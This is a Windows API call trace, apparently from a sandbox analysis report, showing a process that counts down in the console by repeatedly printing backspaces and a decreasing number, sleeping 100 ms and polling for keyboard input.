[0189.299] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083896") returned 8
[0189.299] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0189.300] __iob_func () returned 0x757a2900
[0189.300] _fileno (_File=0x757a2920) returned 1
[0189.300] _errno () returned 0x5507d8
[0189.300] _get_osfhandle (_FileHandle=1) returned 0x4c
[0189.300] _errno () returned 0x5507d8
[0189.300] GetFileType (hFile=0x4c) returned 0x2
[0189.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0189.300] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0189.300] lstrlenW (lpString="\x08\x08\x08\x083896") returned 8
[0189.300] GetConsoleOutputCP () returned 0x1b5
[0189.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083896", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0189.300] GetConsoleOutputCP () returned 0x1b5
[0189.300] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083896", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083896", lpUsedDefaultChar=0x0) returned 8
[0189.300] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0189.300] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0189.300] Sleep (dwMilliseconds=0x64)
[0189.487] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0189.487] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
[0189.487] Sleep (dwMilliseconds=0x64)
[0189.659] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0189.659] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
[0189.659] Sleep (dwMilliseconds=0x64)
[0189.830] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0189.830] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
[0189.830] Sleep (dwMilliseconds=0x64)
[0190.017] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.017] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
[0190.017] Sleep (dwMilliseconds=0x64)
[0190.157] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.157] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6019
[0190.157] Sleep (dwMilliseconds=0x64)
[0190.298] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.298] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.298] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083895") returned 8
[0190.298] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0190.298] __iob_func () returned 0x757a2900
[0190.298] _fileno (_File=0x757a2920) returned 1
[0190.298] _errno () returned 0x5507d8
[0190.298] _get_osfhandle (_FileHandle=1) returned 0x4c
[0190.298] _errno () returned 0x5507d8
[0190.298] GetFileType (hFile=0x4c) returned 0x2
[0190.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0190.298] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0190.299] lstrlenW (lpString="\x08\x08\x08\x083895") returned 8
[0190.299] GetConsoleOutputCP () returned 0x1b5
[0190.299] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083895", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0190.299] GetConsoleOutputCP () returned 0x1b5
[0190.299] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083895", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083895", lpUsedDefaultChar=0x0) returned 8
[0190.299] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0190.299] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0190.299] Sleep (dwMilliseconds=0x64)
[0190.438] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.438] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.438] Sleep (dwMilliseconds=0x64)
[0190.578] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.579] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.579] Sleep (dwMilliseconds=0x64)
[0190.698] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.698] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.698] Sleep (dwMilliseconds=0x64)
[0190.797] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.797] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.797] Sleep (dwMilliseconds=0x64)
[0190.906] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0190.906] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0190.906] Sleep (dwMilliseconds=0x64)
[0191.015] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.015] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0191.015] Sleep (dwMilliseconds=0x64)
[0191.124] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601a
[0191.125] Sleep (dwMilliseconds=0x64)
[0191.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.234] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.234] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083894") returned 8
[0191.234] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0191.234] __iob_func () returned 0x757a2900
[0191.234] _fileno (_File=0x757a2920) returned 1
[0191.234] _errno () returned 0x5507d8
[0191.234] _get_osfhandle (_FileHandle=1) returned 0x4c
[0191.234] _errno () returned 0x5507d8
[0191.234] GetFileType (hFile=0x4c) returned 0x2
[0191.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0191.234] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0191.234] lstrlenW (lpString="\x08\x08\x08\x083894") returned 8
[0191.234] GetConsoleOutputCP () returned 0x1b5
[0191.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083894", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0191.235] GetConsoleOutputCP () returned 0x1b5
[0191.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083894", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083894", lpUsedDefaultChar=0x0) returned 8
[0191.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0191.235] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0191.235] Sleep (dwMilliseconds=0x64)
[0191.343] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.343] Sleep (dwMilliseconds=0x64)
[0191.452] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.452] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.452] Sleep (dwMilliseconds=0x64)
[0191.561] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.562] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.562] Sleep (dwMilliseconds=0x64)
[0191.671] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.671] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.671] Sleep (dwMilliseconds=0x64)
[0191.787] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.787] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.787] Sleep (dwMilliseconds=0x64)
[0191.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.889] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.889] Sleep (dwMilliseconds=0x64)
[0191.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0191.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0191.998] Sleep (dwMilliseconds=0x64)
[0192.107] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0192.108] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0192.108] Sleep (dwMilliseconds=0x64)
[0192.217] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0192.217] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601b
[0192.217] Sleep (dwMilliseconds=0x64)
[0192.326] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0192.326] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0192.326] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083893") returned 8
[0192.326] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0192.326] __iob_func () returned 0x757a2900
[0192.327] _fileno (_File=0x757a2920) returned 1
[0192.327] _errno () returned 0x5507d8
[0192.327] _get_osfhandle (_FileHandle=1) returned 0x4c
[0192.327] _errno () returned 0x5507d8
[0192.327] GetFileType (hFile=0x4c) returned 0x2
[0192.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0192.327] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0192.327] lstrlenW (lpString="\x08\x08\x08\x083893") returned 8
[0192.327] GetConsoleOutputCP () returned 0x1b5
[0192.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083893", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0192.327] GetConsoleOutputCP () returned 0x1b5
[0192.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083893", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083893", lpUsedDefaultChar=0x0) returned 8
[0192.327] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0192.327] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0192.327] Sleep (dwMilliseconds=0x64)
[0192.436] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0192.437] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0192.437] Sleep (dwMilliseconds=0x64)
[0193.589] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0193.589] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0193.589] Sleep (dwMilliseconds=0x64)
[0193.858] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0193.858] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0193.858] Sleep (dwMilliseconds=0x64)
[0193.978] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0193.978] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0193.978] Sleep (dwMilliseconds=0x64)
[0194.077] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.079] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0194.079] Sleep (dwMilliseconds=0x64)
[0194.225] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.225] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0194.225] Sleep (dwMilliseconds=0x64)
[0194.330] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.330] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601c
[0194.330] Sleep (dwMilliseconds=0x64)
[0194.475] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.475] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0194.475] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083892") returned 8
[0194.475] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0194.475] __iob_func () returned 0x757a2900
[0194.475] _fileno (_File=0x757a2920) returned 1
[0194.475] _errno () returned 0x5507d8
[0194.475] _get_osfhandle (_FileHandle=1) returned 0x4c
[0194.475] _errno () returned 0x5507d8
[0194.475] GetFileType (hFile=0x4c) returned 0x2
[0194.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0194.475] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0194.476] lstrlenW (lpString="\x08\x08\x08\x083892") returned 8
[0194.476] GetConsoleOutputCP () returned 0x1b5
[0194.476] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083892", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0194.476] GetConsoleOutputCP () returned 0x1b5
[0194.476] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083892", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083892", lpUsedDefaultChar=0x0) returned 8
[0194.476] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0194.476] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0194.476] Sleep (dwMilliseconds=0x64)
[0194.573] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.573] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0194.573] Sleep (dwMilliseconds=0x64)
[0194.683] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.684] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0194.684] Sleep (dwMilliseconds=0x64)
[0194.806] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.806] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0194.806] Sleep (dwMilliseconds=0x64)
[0194.948] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0194.948] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0194.948] Sleep (dwMilliseconds=0x64)
[0195.087] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.087] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0195.087] Sleep (dwMilliseconds=0x64)
[0195.228] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.228] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0195.228] Sleep (dwMilliseconds=0x64)
[0195.391] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.392] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601d
[0195.392] Sleep (dwMilliseconds=0x64)
[0195.530] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.530] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0195.530] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083891") returned 8
[0195.530] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0195.531] __iob_func () returned 0x757a2900
[0195.531] _fileno (_File=0x757a2920) returned 1
[0195.531] _errno () returned 0x5507d8
[0195.531] _get_osfhandle (_FileHandle=1) returned 0x4c
[0195.531] _errno () returned 0x5507d8
[0195.531] GetFileType (hFile=0x4c) returned 0x2
[0195.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0195.531] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0195.531] lstrlenW (lpString="\x08\x08\x08\x083891") returned 8
[0195.531] GetConsoleOutputCP () returned 0x1b5
[0195.531] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083891", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0195.531] GetConsoleOutputCP () returned 0x1b5
[0195.531] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083891", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083891", lpUsedDefaultChar=0x0) returned 8
[0195.531] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0195.531] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0195.531] Sleep (dwMilliseconds=0x64)
[0195.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.654] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0195.654] Sleep (dwMilliseconds=0x64)
[0195.772] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.772] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0195.772] Sleep (dwMilliseconds=0x64)
[0195.872] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0195.872] Sleep (dwMilliseconds=0x64)
[0195.986] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0195.989] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0195.989] Sleep (dwMilliseconds=0x64)
[0196.085] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.085] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0196.085] Sleep (dwMilliseconds=0x64)
[0196.195] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.195] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0196.195] Sleep (dwMilliseconds=0x64)
[0196.304] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.304] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0196.304] Sleep (dwMilliseconds=0x64)
[0196.413] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.413] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601e
[0196.413] Sleep (dwMilliseconds=0x64)
[0196.523] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.523] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0196.523] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083890") returned 8
[0196.523] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0196.523] __iob_func () returned 0x757a2900
[0196.523] _fileno (_File=0x757a2920) returned 1
[0196.523] _errno () returned 0x5507d8
[0196.523] _get_osfhandle (_FileHandle=1) returned 0x4c
[0196.523] _errno () returned 0x5507d8
[0196.523] GetFileType (hFile=0x4c) returned 0x2
[0196.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
